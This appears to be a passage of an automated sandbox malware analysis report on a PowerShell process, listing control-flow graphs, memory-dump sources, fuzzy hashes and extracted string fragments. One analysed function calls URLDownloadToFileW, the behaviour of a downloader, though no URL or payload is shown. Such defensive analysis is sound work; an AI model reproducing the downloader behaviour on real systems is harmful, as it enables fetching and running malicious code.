4be7ea8 10791->10793 10793->10777

                                                Executed Functions

                                                Function 04BE7A18 Relevance: 1.9, APIs: 1, Instructions: 362COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 174 4be7a18-4be7a4a 176 4be7a4c-4be7a53 174->176 177 4be7a90 174->177 179 4be7a64 176->179 180 4be7a55-4be7a62 176->180 178 4be7a93-4be7acf 177->178 189 4be7b58-4be7b63 178->189 190 4be7ad5-4be7ade 178->190 181 4be7a66-4be7a68 179->181 180->181 182 4be7a6f-4be7a71 181->182 183 4be7a6a-4be7a6d 181->183 187 4be7a82 182->187 188 4be7a73-4be7a80 182->188 186 4be7a8e 183->186 186->178 192 4be7a84-4be7a86 187->192 188->192 193 4be7b65-4be7b68 189->193 194 4be7b72-4be7b94 189->194 190->189 191 4be7ae0-4be7ae6 190->191 195 4be7aec-4be7af9 191->195 196 4be7de8-4be7dfd 191->196 192->186 193->194 201 4be7c5e-4be7cf6 194->201 202 4be7b9a-4be7ba3 194->202 198 4be7b4f-4be7b56 195->198 199 4be7afb-4be7b2e 195->199 206 4be7e6f-4be7e70 196->206 207 4be7dff-4be7e52 196->207 198->189 198->191 216 4be7b4b 199->216 217 4be7b30-4be7b33 199->217 243 4be7cf9-4be7d52 201->243 202->196 205 4be7ba9-4be7be7 202->205 228 4be7be9-4be7bff 205->228 229 4be7c01-4be7c14 205->229 210 4be7e71-4be7ea6 URLDownloadToFileW 206->210 223 4be7e5d-4be7e63 207->223 224 4be7e54-4be7e5a 207->224 214 4be7eaf-4be7ec3 210->214 215 4be7ea8-4be7eae 210->215 215->214 216->198 220 4be7b3f-4be7b48 217->220 221 4be7b35-4be7b38 217->221 221->220 223->210 225 4be7e65-4be7e6e 223->225 224->223 225->210 230 4be7c16-4be7c1d 228->230 229->230 231 4be7c1f-4be7c30 230->231 232 4be7c42-4be7c58 230->232 231->232 237 4be7c32-4be7c3b 231->237 232->201 232->202 237->232 256 4be7d55 call 78545f4 243->256 257 4be7d55 call 7854610 243->257 248 4be7d57-4be7d60 249 4be7d7a-4be7d8d 248->249 250 4be7d62-4be7d78 248->250 251 4be7d8f-4be7d96 249->251 250->251 252 4be7d98-4be7d9e 251->252 253 4be7da5-4be7daf 251->253 252->253 253->243 256->248 257->248
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1268274167.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_4be0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06fefe11eb8d77dbdb59e91d67e60d75c8e67e113c3f473eae6cacce92169306
                                                • Instruction ID: 0cb83b3e77219c803737b43717c5d6c5d464394da257a4b2cb58be9dbcb922d7
                                                • Opcode Fuzzy Hash: 06fefe11eb8d77dbdb59e91d67e60d75c8e67e113c3f473eae6cacce92169306
                                                • Instruction Fuzzy Hash: 33E12C75A00219EFDB15CF99D484AADFBB2FF88310F248159E804AB355DB35ED52CB90
                                                Function 07854610 Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 7854610-785463b 1 7854641-7854646 0->1 2 7854af2-7854b12 0->2 3 785465e-7854663 1->3 4 7854648-785464e 1->4 10 7854b14-7854b16 2->10 11 7854b1c-7854b1e 2->11 8 7854665-7854671 3->8 9 7854673 3->9 5 7854650 4->5 6 7854652-785465c 4->6 5->3 6->3 12 7854675-7854677 8->12 9->12 14 7854b1f-7854b25 10->14 15 7854b18-7854b1b 10->15 11->14 16 7854a93-7854a9d 12->16 17 785467d-7854687 12->17 20 7854b35 14->20 21 7854b27-7854b33 14->21 15->11 18 7854a9f-7854aa8 16->18 19 7854aab-7854ab1 16->19 17->2 22 785468d-7854692 17->22 26 7854ab7-7854ac3 19->26 27 7854ab3-7854ab5 19->27 23 7854b37-7854b39 20->23 21->23 24 7854694-785469a 22->24 25 78546aa-78546b8 22->25 31 7854b7b-7854b85 23->31 32 7854b3b-7854b42 23->32 29 785469c 24->29 30 785469e-78546a8 24->30 25->16 40 78546be-78546dd 25->40 28 7854ac5-7854aef 26->28 27->28 29->25 30->25 36 7854b87-7854b8b 31->36 37 7854b8e-7854b94 31->37 32->31 34 7854b44-7854b61 32->34 45 7854b63-7854b75 34->45 46 7854bc9-7854bce 34->46 41 7854b96-7854b98 37->41 42 7854b9a-7854ba6 37->42 40->16 54 78546e3-78546ed 40->54 44 7854ba8-7854bc6 41->44 42->44 45->31 46->45 54->2 55 78546f3-78546f8 54->55 56 7854710-7854714 55->56 57 78546fa-7854700 55->57 56->16 60 785471a-785471e 56->60 58 7854704-785470e 57->58 59 7854702 57->59 58->56 59->56 60->16 61 7854724-7854728 60->61 61->16 63 785472e-785473e 61->63 64 7854744-785476b 63->64 65 78547c6-7854815 63->65 70 7854785-78547b3 64->70 71 785476d-7854773 64->71 82 785481c-785482f 65->82 80 78547b5-78547b7 70->80 81 78547c1-78547c4 70->81 73 7854775 71->73 74 7854777-7854783 71->74 73->70 74->70 80->81 81->82 83 7854835-785485c 82->83 84 78548b7-7854906 82->84 89 7854876-78548a4 83->89 90 785485e-7854864 83->90 101 785490d-7854920 84->101 99 78548a6-78548a8 89->99 100 78548b2-78548b5 89->100 91 7854866 90->91 92 7854868-7854874 90->92 91->89 92->89 99->100 100->101 102 7854926-785494d 101->102 103 78549a8-78549f7 101->103 108 7854967-7854995 102->108 109 785494f-7854955 102->109 120 78549fe-7854a2c 103->120 118 7854997-7854999 108->118 119 78549a3-78549a6 108->119 110 7854957 109->110 111 7854959-7854965 109->111 110->108 111->108 118->119 119->120 125 7854a2f call 4be7a18 120->125 126 7854a2f call 4be7a08 120->126 127 7854a2f call 4be7c45 120->127 128 7854a2f call 4be1c00 120->128 123 7854a34-7854a90 125->123 126->123 127->123 128->123
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPq$tPq
                                                • API String ID: 0-4270251778
                                                • Opcode ID: 2b26f081387c5cebfc4a7b57ea9c0ddf8a72b07c459df78933611d23c6f07198
                                                • Instruction ID: 1b1cffb4e596ee17d7f70a3ae786f8b47c476371467bdce24222342e56472e38
                                                • Opcode Fuzzy Hash: 2b26f081387c5cebfc4a7b57ea9c0ddf8a72b07c459df78933611d23c6f07198
                                                • Instruction Fuzzy Hash: 8DF1C5B4B00345AFDB148F69C410B6ABBE2EBD9610F288569ED09DB350DF72DC81CB95
                                                Function 078504F8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 129 78504f8-785050a 132 7850510-7850521 129->132 133 78505ca-78505ea 129->133 136 7850523-7850529 132->136 137 785053b-7850558 132->137 138 78505f3-78505f6 133->138 139 78505ec-78505ee 133->139 140 785052d-7850539 136->140 141 785052b 136->141 137->133 149 785055a-785057c 137->149 142 78505f7-78505fd 138->142 139->142 143 78505f0-78505f1 139->143 140->137 141->137 145 78505ff-785063e 142->145 146 785066b-7850675 142->146 143->138 166 7850640-785064e 145->166 167 78506bb-78506c0 145->167 147 7850677-785067d 146->147 148 7850680-7850686 146->148 151 785068c-7850698 148->151 152 7850688-785068a 148->152 157 7850596-78505ae 149->157 158 785057e-7850584 149->158 154 785069a-78506b8 151->154 152->154 168 78505b0-78505b2 157->168 169 78505bc-78505c7 157->169 160 7850586 158->160 161 7850588-7850594 158->161 160->157 161->157 173 7850656-7850665 166->173 167->166 168->169 173->146
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPq$tPq
                                                • API String ID: 0-4270251778
                                                • Opcode ID: 8b0db65041a8dd6314333298698e6c1efa5ff836bbe081547f832d20a6d780b5
                                                • Instruction ID: 51844442fc677846ca6b7de16ff4c38a01f5d9b37a79fe6879e84a35232b3cb9
                                                • Opcode Fuzzy Hash: 8b0db65041a8dd6314333298698e6c1efa5ff836bbe081547f832d20a6d780b5
                                                • Instruction Fuzzy Hash: 915177B5B00315AFD7248B798814B6ABBE2EFD5710F18842AED49EF381DA71DC01C3A1
                                                Function 04BE1C00 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 258 4be1c00-4be7e52 261 4be7e5d-4be7e63 258->261 262 4be7e54-4be7e5a 258->262 263 4be7e65-4be7e6e 261->263 264 4be7e71-4be7ea6 URLDownloadToFileW 261->264 262->261 263->264 266 4be7eaf-4be7ec3 264->266 267 4be7ea8-4be7eae 264->267 267->266
                                                APIs
                                                • URLDownloadToFileW.URLMON(?,00000000,00000008,?,?), ref: 04BE7E99
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1268274167.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_4be0000_powershell.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: 667be3356e4a04a95f122227f62cb908903ece1a1135747a3d9de9261457e6c4
                                                • Instruction ID: ca18da8e0803d4a5f53ce4b1317acf3b661402343c200ca65cf8cade75450696
                                                • Opcode Fuzzy Hash: 667be3356e4a04a95f122227f62cb908903ece1a1135747a3d9de9261457e6c4
                                                • Instruction Fuzzy Hash: 792137B5D0121ADFCB14CF9AD884BEEFBB4FB48310F108569E818A7210D374A954CBA0
                                                Function 078545F4 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 269 78545f4-785463b 271 7854641-7854646 269->271 272 7854af2-7854b12 269->272 273 785465e-7854663 271->273 274 7854648-785464e 271->274 280 7854b14-7854b16 272->280 281 7854b1c-7854b1e 272->281 278 7854665-7854671 273->278 279 7854673 273->279 275 7854650 274->275 276 7854652-785465c 274->276 275->273 276->273 282 7854675-7854677 278->282 279->282 284 7854b1f-7854b25 280->284 285 7854b18-7854b1b 280->285 281->284 286 7854a93-7854a9d 282->286 287 785467d-7854687 282->287 290 7854b35 284->290 291 7854b27-7854b33 284->291 285->281 288 7854a9f-7854aa8 286->288 289 7854aab-7854ab1 286->289 287->272 292 785468d-7854692 287->292 296 7854ab7-7854ac3 289->296 297 7854ab3-7854ab5 289->297 293 7854b37-7854b39 290->293 291->293 294 7854694-785469a 292->294 295 78546aa-78546b8 292->295 301 7854b7b-7854b85 293->301 302 7854b3b-7854b42 293->302 299 785469c 294->299 300 785469e-78546a8 294->300 295->286 310 78546be-78546dd 295->310 298 7854ac5-7854aef 296->298 297->298 299->295 300->295 306 7854b87-7854b8b 301->306 307 7854b8e-7854b94 301->307 302->301 304 7854b44-7854b61 302->304 315 7854b63-7854b75 304->315 316 7854bc9-7854bce 304->316 311 7854b96-7854b98 307->311 312 7854b9a-7854ba6 307->312 310->286 324 78546e3-78546ed 310->324 314 7854ba8-7854bc6 311->314 312->314 315->301 316->315 324->272 325 78546f3-78546f8 324->325 326 7854710-7854714 325->326 327 78546fa-7854700 325->327 326->286 330 785471a-785471e 326->330 328 7854704-785470e 327->328 329 7854702 327->329 328->326 329->326 330->286 331 7854724-7854728 330->331 331->286 333 785472e-785473e 331->333 334 7854744-785476b 333->334 335 78547c6-7854815 333->335 340 7854785-78547b3 334->340 341 785476d-7854773 334->341 352 785481c-785482f 335->352 350 78547b5-78547b7 340->350 351 78547c1-78547c4 340->351 343 7854775 341->343 344 7854777-7854783 341->344 343->340 344->340 350->351 351->352 353 7854835-785485c 352->353 354 78548b7-7854906 352->354 359 7854876-78548a4 353->359 360 785485e-7854864 353->360 371 785490d-7854920 354->371 369 78548a6-78548a8 359->369 370 78548b2-78548b5 359->370 361 7854866 360->361 362 7854868-7854874 360->362 361->359 362->359 369->370 370->371 372 7854926-785494d 371->372 373 78549a8-78549f7 371->373 378 7854967-7854995 372->378 379 785494f-7854955 372->379 390 78549fe-7854a2c 373->390 388 7854997-7854999 378->388 389 78549a3-78549a6 378->389 380 7854957 379->380 381 7854959-7854965 379->381 380->378 381->378 388->389 389->390 395 7854a2f call 4be7a18 390->395 396 7854a2f call 4be7a08 390->396 397 7854a2f call 4be7c45 390->397 398 7854a2f call 4be1c00 390->398 393 7854a34-7854a90 395->393 396->393 397->393 398->393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPq
                                                • API String ID: 0-789928099
                                                • Opcode ID: f4e6c48286b7c89076b8bc9e9b03bdc7beb8ffeadd12da1ebb0272d3d8f7acba
                                                • Instruction ID: cc70659743b31240bb9c765fb8fb18ed992829422ac93bf6e4e294e9b6f0a515
                                                • Opcode Fuzzy Hash: f4e6c48286b7c89076b8bc9e9b03bdc7beb8ffeadd12da1ebb0272d3d8f7acba
                                                • Instruction Fuzzy Hash: 9391D3B4A00246AFDB24CF59C441B69BBF2FB94710F288569ED09DB350DB72EC81CB94
                                                Function 07851FF5 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 597 7851ff5-7851fff 598 7852001 597->598 599 7852072-785207c 597->599 600 7852005-785200f 598->600 601 7852003 598->601 602 78520c2-78520f5 599->602 603 785207e-7852099 599->603 604 7852011-7852020 600->604 601->604 621 78520fc-7852105 602->621 609 78520b3-78520b7 603->609 610 785209b-78520a1 603->610 613 7852026-7852044 604->613 614 7852108-7852112 604->614 616 78520be-78520c0 609->616 611 78520a5-78520b1 610->611 612 78520a3 610->612 611->609 612->609 613->614 629 785204a-785206f 613->629 617 7852114-785211d 614->617 618 7852120-7852126 614->618 616->621 622 785212c-7852138 618->622 623 7852128-785212a 618->623 625 785213a-7852155 622->625 623->625 629->599 629->614
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26b39d213cd3c577078003115285d86118562c5e7015d1623b9b87a8949ad495
                                                • Instruction ID: d1135cf5faba49cdf8ed4ee6eb71acec3359bedb3b99d633210ae87f16485a42
                                                • Opcode Fuzzy Hash: 26b39d213cd3c577078003115285d86118562c5e7015d1623b9b87a8949ad495
                                                • Instruction Fuzzy Hash: 5F312AF1B002508FEB1597754C10A6EBBA2BBE5214B1544BECA42CF282EE32DD51C7E6
                                                Function 0322D006 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1267163583.000000000322D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0322D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_322d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67aac669e3d07e48e11ea2be32948653cb9c6eece87190c54f21a93401b369b1
                                                • Instruction ID: e29cde7530cd34d6eea57a38ab649489c0a4c7765ca89173158c9f381893a277
                                                • Opcode Fuzzy Hash: 67aac669e3d07e48e11ea2be32948653cb9c6eece87190c54f21a93401b369b1
                                                • Instruction Fuzzy Hash: 98012D7144D3D06FD7128B258D94752BFA8DF47224F1984DBD8948F2A7C2685C85CB72
                                                Function 0322D01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1267163583.000000000322D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0322D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_322d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b592a6d2e801458051e10a7a53f67c64cc45b1784c51cd3f423ccf1b2bc9bfc
                                                • Instruction ID: 782629ed528016477fbe49a2c6a75bc3ce2800bb4784adf6223fc8fddf81b51b
                                                • Opcode Fuzzy Hash: 1b592a6d2e801458051e10a7a53f67c64cc45b1784c51cd3f423ccf1b2bc9bfc
                                                • Instruction Fuzzy Hash: 0A01F731418711AEE720CA25CCC0767FF9CDF45360F18C05ADC684F292C6789982CAB1

                                                Non-executed Functions

                                                Function 078515A8 Relevance: 9.2, Strings: 7, Instructions: 484COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                • API String ID: 0-2432477355
                                                • Opcode ID: b829f664441c5208b1d1bcd6fd42c46e4536752e1c43d8ed10606be067df7a93
                                                • Instruction ID: 2b4bbb5bc5c89dad84820912dc3f52411f90d88c64d6432c4d755a0ab2629307
                                                • Opcode Fuzzy Hash: b829f664441c5208b1d1bcd6fd42c46e4536752e1c43d8ed10606be067df7a93
                                                • Instruction Fuzzy Hash: F7F14BB5F0034A8FDB258F79840876ABBE6AFD6210F18817AC946CB241EF35DD45C792
                                                Function 07852180 Relevance: 5.4, Strings: 4, Instructions: 392COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$4'q$4'q$4'q
                                                • API String ID: 0-4210068417
                                                • Opcode ID: b05aca760a169709af3e09d25775335825cc85fff7ce364d9d9756005b17e745
                                                • Instruction ID: b72818990362a5a4babbc450bf00614b9a7312b091090dfca27d3e1bae1ae2a1
                                                • Opcode Fuzzy Hash: b05aca760a169709af3e09d25775335825cc85fff7ce364d9d9756005b17e745
                                                • Instruction Fuzzy Hash: CED188F5B043468FD7148F79881076ABBE2BFE6210F18807AD945CB291EF35D942C792
                                                Function 07854DD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $a9j$$a9j$tPq$tPq
                                                • API String ID: 0-2061247602
                                                • Opcode ID: 128d96d21397eb7849b41aa3ccec372a953c3695c989a7427a7d2ea11cea07d1
                                                • Instruction ID: b9a90ce3358755dab421e9e4d0955ccfca7bf4177a9e2b7792913e2f3a507158
                                                • Opcode Fuzzy Hash: 128d96d21397eb7849b41aa3ccec372a953c3695c989a7427a7d2ea11cea07d1
                                                • Instruction Fuzzy Hash: 32B160B17043859FD7248F798800766BFE6EFD6220F18817AD949CF281EA75DC91C7A2
                                                Function 07853D30 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$4'q$4'q$4'q
                                                • API String ID: 0-4210068417
                                                • Opcode ID: 1c1605cf4387d214066a9c363d115a178c6fd1fb010c420a341eb94594972e51
                                                • Instruction ID: 0aef5e34b17173f61c890c27bb519d1f164bf2694018342bf95785f566027df8
                                                • Opcode Fuzzy Hash: 1c1605cf4387d214066a9c363d115a178c6fd1fb010c420a341eb94594972e51
                                                • Instruction Fuzzy Hash: 6A818AB0B0434ACFCB258F79C8147AABBF1AF96298F1880BBD845CB641DB35C951C791
                                                Function 07853550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q
                                                • API String ID: 0-4102054182
                                                • Opcode ID: afe71745ed83e8d28c3d07aab7ab674a9734bcf63696eaf2bb81dfe635f5e10e
                                                • Instruction ID: eb65e983ccb216a63dd62680b57abf4192f6e727fdcb45325e4ad61b174548d7
                                                • Opcode Fuzzy Hash: afe71745ed83e8d28c3d07aab7ab674a9734bcf63696eaf2bb81dfe635f5e10e
                                                • Instruction Fuzzy Hash: DD217DF17003465BEB348A6A9800B27AED69BE179DF64813ED946CB7C5DD31C841C361
                                                Function 07850000 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$4'q$$q$$q
                                                • API String ID: 0-3199993180
                                                • Opcode ID: 504162f2b6d88a0dd539c92b63943e69a9fa3ef42c784fc639e6e1b6a6c318ee
                                                • Instruction ID: 4200953b3c8e2729db98e3ba3a39cac6399592c879af257bb20d2b025f5d2542
                                                • Opcode Fuzzy Hash: 504162f2b6d88a0dd539c92b63943e69a9fa3ef42c784fc639e6e1b6a6c318ee
                                                • Instruction Fuzzy Hash: E33189A2A0E3C65FD72743350C216592F726FA3240B5A80EBC981CF1E3D9694C49C3A7